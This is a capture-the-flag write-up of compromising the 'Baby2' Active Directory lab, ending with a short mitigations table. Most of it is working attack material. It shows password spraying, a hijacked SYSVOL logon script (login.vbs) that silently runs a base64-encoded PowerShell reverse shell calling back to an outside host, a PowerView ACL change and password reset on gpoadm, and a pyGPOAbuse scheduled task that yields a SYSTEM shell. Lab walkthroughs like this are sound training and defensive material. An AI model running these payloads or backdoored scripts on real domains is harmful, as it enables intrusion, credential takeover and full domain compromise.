HackTheBoxActiveDirectoryWindowsVulnLabs

BabyTwo

Guest SMB exposes users; credential spray finds username=password accounts; write access to SYSVOL logon script delivers a shell as Amelia.Griffiths; ACL abuse resets GPOADM's password; pyGPOAbuse on

Target: 10.129.234.72 Domain: baby2.vl Difficulty: Medium Category: Active Directory / Windows

Overview

Baby2 is an Active Directory machine hosted on VulnLab. The attack path chains together several common misconfigurations: anonymous/guest SMB enumeration, username-as-password credential spraying, write access to a domain logon script, privilege escalation via ACL abuse (WriteDacl/WriteOwner), and finally full domain compromise via GPO abuse with pyGPOAbuse.

1. Reconnaissance

Nmap Port Scan

The scan reveals a standard Windows Server 2022 Domain Controller

┌──(kali㉿kali)-[~]
└─$ nmap 10.129.234.72 -sCV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-11 19:03:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-03-11T19:04:40+00:00
|_ssl-date: 2026-03-11T19:05:18+00:00; -4s from scanner time.
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2026-03-10T18:53:38
|_Not valid after:  2026-09-09T18:53:38
49153/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-11T19:04:41
|_  start_date: N/A
|_clock-skew: mean: -3s, deviation: 0s, median: -3s

Key findings from the scan:

Domain: baby2.vl
Hostname: dc.baby2.vl
OS: Windows Server 2022 Build 20348
SMB message signing is enabled and required (rules out relay attacks directly)

2. SMB Enumeration — Guest/Null Session

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.72 -u "guest" -p "" --shares
SMB         10.129.234.72   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.72   445    DC               [+] baby2.vl\guest: 
SMB         10.129.234.72   445    DC               [*] Enumerated shares
SMB         10.129.234.72   445    DC               Share           Permissions     Remark
SMB         10.129.234.72   445    DC               -----           -----------     ------
SMB         10.129.234.72   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.72   445    DC               apps            READ            
SMB         10.129.234.72   445    DC               C$                              Default share
SMB         10.129.234.72   445    DC               docs                            
SMB         10.129.234.72   445    DC               homes           READ,WRITE      
SMB         10.129.234.72   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.72   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.234.72   445    DC               SYSVOL                          Logon server share

The homes share being world-writable is a notable finding worth revisiting after credential access.

3. User Enumeration via SMB

With guest/null LDAP or SMB access, a list of domain usernames was gathered, producing users.txt containing accounts such as:

Administrator
Guest
krbtgt
gpoadm
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library

4. Credential Spraying — Username as Password

A common misconfiguration in AD environments is users whose password matches their username. NetExec's --no-brute flag tests each user's name as their own password without triggering lockout policies:

┌──(kali㉿kali)-[~/Documents/baby2]
└─$ nxc smb 10.129.234.72 -u users.txt -p users.txt --no-brute --continue-on-success         
SMB         10.129.234.72   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True)                                                                                              
SMB         10.129.234.72   445    DC               [-] baby2.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\gpoadm:gpoadm STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         10.129.234.72   445    DC               [+] baby2.vl\library:library

5. Expanding Access with Carl.Moore

Checking share permissions as Carl.Moore reveals expanded access:

┌──(kali㉿kali)-[~/Documents/baby2]
└─$ nxc smb 10.129.234.72 -u Carl.Moore -p Carl.Moore --shares
SMB         10.129.234.72   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.72   445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.234.72   445    DC               [*] Enumerated shares
SMB         10.129.234.72   445    DC               Share           Permissions     Remark
SMB         10.129.234.72   445    DC               -----           -----------     ------
SMB         10.129.234.72   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.72   445    DC               apps            READ,WRITE      
SMB         10.129.234.72   445    DC               C$                              Default share
SMB         10.129.234.72   445    DC               docs            READ,WRITE      
SMB         10.129.234.72   445    DC               homes           READ,WRITE      
SMB         10.129.234.72   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.72   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.234.72   445    DC               SYSVOL          READ            Logon server share

The apps and docs shares are now writable. More critically, investigating SYSVOL/NETLOGON reveals a logon script (login.vbs) that is executed automatically every time a user logs in. This is the key to achieving initial code execution on the domain controller.

6. Logon Script Hijacking — Initial Foothold

Understanding the Attack Vector

The login.vbs script is stored in the SYSVOL scripts folder and mapped as the domain logon script via Group Policy. Because an automation runs this script on every user login, replacing it with a malicious version will trigger a reverse shell as the next user who authenticates.

Step 1 — Generate Encoded PowerShell Reverse Shell Payload

A standard PowerShell TCP reverse shell is base64-encoded (UTF-16LE) to avoid character escaping issues when embedded inside VBScript:

┌──(kali㉿kali)-[~] └─$ python3 -c " import base64 cmd = "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" encoded = base64.b64encode(cmd.encode('utf-16-le')).decode() print(encoded) " 

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Step 2 — Craft the Malicious VBScript

The malicious login.vbs preserves the original drive mapping functionality (to avoid detection/disruption) and appends a GetShell() subroutine that launches the encoded PowerShell payload silently:

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    Set objNetwork = Nothing
End Sub

Sub GetShell()
    Dim objShell
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==", 0, False
    Set objShell = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
GetShell

Step 3 — Deploy the Malicious Script via SMB

Connecting to the SYSVOL scripts folder using the library:library credentials (which have write access to NETLOGON), the original script is renamed and the malicious version uploaded:

smb: \baby2.vl\scripts\> rename login.vbs loginog.vbs
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (1.7 kB/s) (average 1.5 kB/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Wed Mar 11 16:20:28 2026
  ..                                  D        0  Tue Aug 22 13:43:55 2023
  login.vbs                           A     1649  Wed Mar 11 16:20:29 2026
  loginog.vbs                         A      992  Sat Sep  2 10:55:51 2023

                6126847 blocks of size 4096. 1959869 blocks available

Step 4 — Catch the Shell

When the next user logs in and the script executes, a reverse shell connects back:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444                                          
listening on [any] 4444 ...
connect to [10.10.16.5] from (UNKNOWN) [10.129.234.72] 58799
PS C:\Windows\system32> cd ../../..
PS C:\> ls
    Directory: C:\
Mode                 LastWriteTime         Length Name                             
----                 -------------         ------ ----                             
d-----         4/16/2025   2:27 AM                inetpub                          
d-----          5/8/2021   1:20 AM                PerfLogs                         
d-r---         4/16/2025   1:51 AM                Program Files                    
d-----         8/22/2023  10:30 AM                Program Files (x86)              
d-----         8/22/2023   1:10 PM                shares                           
d-----         8/22/2023  12:35 PM                temp                             
d-r---         8/22/2023  12:54 PM                Users                            
d-----         8/20/2025   9:05 AM                Windows                          
-a----         4/16/2025   2:48 AM             32 user.txt                         
PS C:\> type user.txt
4278xxxxxxxxxxxxxxxxxxxxxx5c38

The shell is running as Amelia.Griffiths. who has WriteDacl & WriteOwner on GPOADM user and GPO-MANAGEMENT

7. Privilege Escalation — ACL Abuse & GPO Abuse

Enumerating Privileges (BloodHound)

Running BloodHound reveals a compelling privilege chain:

AMELIA.GRIFFITHS → (MemberOf) → LEGACY group
LEGACY → (WriteDacl, WriteOwner) → GPOADM user
LEGACY → (WriteDacl, WriteOwner) → GPO-MANAGEMENT group
GPOADM → (GenericAll) → DEFAULT DOMAIN POLICY
GPOADM → (GenericAll) → DEFAULT DOMAIN CONTROLLERS POLICY

and GPOADM has GenericWrite on these two Policies tho we only need Default Domain Policy to exploit

and from here we'll get its GPO-ID .

The attack path is:

Abuse WriteDacl/WriteOwner on GPOADM to grant ourselves full control
Reset GPOADM's password
Use GPOADM's GenericAll on the Default Domain Policy GPO to inject a malicious scheduled task via pyGPOAbuse
Trigger a gpupdate to execute the task as SYSTEM

Step 1 — Grant Full Control Over GPOADM

From Amelia's shell (PowerView is transferred):

PS C:\Users\Amelia.Griffiths\Desktop> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

This leverages the WriteDacl permission Amelia holds on GPOADM via the LEGACY group to grant herself GenericAll rights over the GPOADM account.

Step 2 — Reset GPOADM's Password

PS C:\Users\Amelia.Griffiths\Desktop> $cred = ConvertTo-SecureString 'Test123!' -AsPlainText -Force
PS C:\Users\Amelia.Griffiths\Desktop> set-domainuserpassword gpoadm -accountpassword $cred

Verify the new credentials work:

┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.234.72 -u gpoadm -p 'Test123!'         
SMB         10.129.234.72   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.72   445    DC               [+] baby2.vl\gpoadm:Test123!

Step 3 — Identify the Default Domain Policy GPO ID

From BloodHound, the Default Domain Policy object information shows:

Object ID: 16398B5E-3BC4-4CD2-A9CB-33B690E6A6AD
GPO ID (CN): 31B2F340-016D-11D2-945F-00C04FB984F9
Gpcpath: \BABY2.VL\SYSVOL\BABY2.VL\POLICIES\{31B2F340-016D-11D2-945F-00C04FB984F9}
Affected Objects: 27 (includes all domain computers and users)

This GPO applies domain-wide, making it perfect for a SYSTEM-level payload.

Step 4 — Generate Second Reverse Shell Payloa

A new encoded PowerShell payload is generated, this time calling back on port 9001:

┌──(kali㉿kali)-[~]
└─$ python3 -c "
import base64
cmd = \"\$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes,0,\$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i);\$sendback = (iex \$data 2>&1 | Out-String);\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"
encoded = base64.b64encode(cmd.encode('utf-16-le')).decode()
print(encoded)
"
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANQAnACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Step 5 — Inject Malicious Scheduled Task via pyGPOAbuse

pyGPOAbuse is a Python tool that abuses GenericAll/GenericWrite rights on a GPO to inject a scheduled task that runs as SYSTEM:

┌──(kali㉿kali)-[~/pyGPOAbuse]
└─$ cd ~/pyGPOAbuse
python3 -m venv venv
source venv/bin/activate
pip install impacket==0.11.0
pip install -r requirements.txt

┌──(venv)─(kali㉿kali)-[~/pyGPOAbuse]
└─$ python3 pygpoabuse.py baby2.vl/gpoadm:'Test123!' \
  -command "powershell -exec bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4ANQAnACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" \
  -dc-ip 10.129.234.72 \
  -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -f
[+] ScheduledTask TASK_8dfe9cf0 created!

Step 6 — Force GPO Update to Trigger Execution

From Amelia's existing shell, force an immediate Group Policy refresh:

PS C:\Users\Amelia.Griffiths\Desktop> gpupdate
Updating policy...

Computer Policy update has completed successfully.

User Policy update has completed successfully.

Step 7 — Catch SYSTEM Shell

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.5] from (UNKNOWN) [10.129.234.72] 54789

PS C:\Users> whoami
nt authority\system

PS C:\Windows\system32> pwd 
Path               
----               
C:\Windows\system32

PS C:\Windows\system32> cd ../../Users

PS C:\Users> type Administrator/Desktop/root.txt
2935xxxxxxxxxxxxxxxxxxxxx40f9

8. Attack Chain Summary

[Guest SMB Enum]
    └─> Discovered users via LDAP/SMB null session
        └─> [Credential Spray: username == password]
            ├─> Carl.Moore:Carl.Moore  → write access to apps/docs
            └─> library:library       → write access to SYSVOL scripts
                └─> [Logon Script Hijack: login.vbs → reverse shell]
                    └─> Shell as Amelia.Griffiths
                        └─> [BloodHound: LEGACY group WriteDacl on GPOADM]
                            └─> Add-DomainObjectAcl → Reset GPOADM password
                                └─> [pyGPOAbuse: GPOADM GenericAll on Default Domain Policy]
                                    └─> Scheduled Task injected → gpupdate
                                        └─> SYSTEM shell → root.txt

9. Tools Used

Tool

Purpose

nmap

Port and service enumeration

NetExec (nxc)

SMB auth, share enum, credential spraying

smbclient

SMB share interaction, file upload

BloodHound

AD privilege path analysis

PowerView

In-memory AD enumeration and ACL manipulation

pyGPOAbuse

GPO-based code execution as SYSTEM

netcat

Reverse shell listener

10. Key Takeaways & Mitigations

Finding

Mitigation

Null/guest SMB session exposes usernames

Disable null session access; restrict guest account

Username == password for multiple accounts

Enforce strong password policy; audit weak credentials with BloodHound or similar

Write access to SYSVOL logon scripts for low-priv users

Restrict SYSVOL script write access to Domain Admins only

Excessive ACLs: WriteDacl/WriteOwner on privileged accounts

Audit and remove unnecessary ACE entries; implement AD tiering

GenericAll on Default Domain Policy

Restrict GPO modification rights; monitor GPO changes via SIEM

gpupdate force-able by standard users

Consider restricting or monitoring gpupdate /force usage

PreviousVoleur NextTombWatcher

Last updated 5 days ago

hashtagOverview

hashtag1. Reconnaissance

hashtagNmap Port Scan

hashtag2. SMB Enumeration — Guest/Null Session

hashtag3. User Enumeration via SMB

hashtag4. Credential Spraying — Username as Password

hashtag5. Expanding Access with Carl.Moore

hashtag6. Logon Script Hijacking — Initial Foothold

hashtagUnderstanding the Attack Vector

hashtagStep 1 — Generate Encoded PowerShell Reverse Shell Payload

hashtagStep 2 — Craft the Malicious VBScript

hashtagStep 3 — Deploy the Malicious Script via SMB

hashtagStep 4 — Catch the Shell

hashtag7. Privilege Escalation — ACL Abuse & GPO Abuse

hashtagEnumerating Privileges (BloodHound)

hashtagStep 1 — Grant Full Control Over GPOADM

hashtagStep 2 — Reset GPOADM's Password

hashtagStep 3 — Identify the Default Domain Policy GPO ID

hashtagStep 4 — Generate Second Reverse Shell Payloa

hashtagStep 5 — Inject Malicious Scheduled Task via pyGPOAbuse

hashtagStep 6 — Force GPO Update to Trigger Execution

hashtagStep 7 — Catch SYSTEM Shell

hashtag8. Attack Chain Summary

hashtag9. Tools Used

hashtag10. Key Takeaways & Mitigations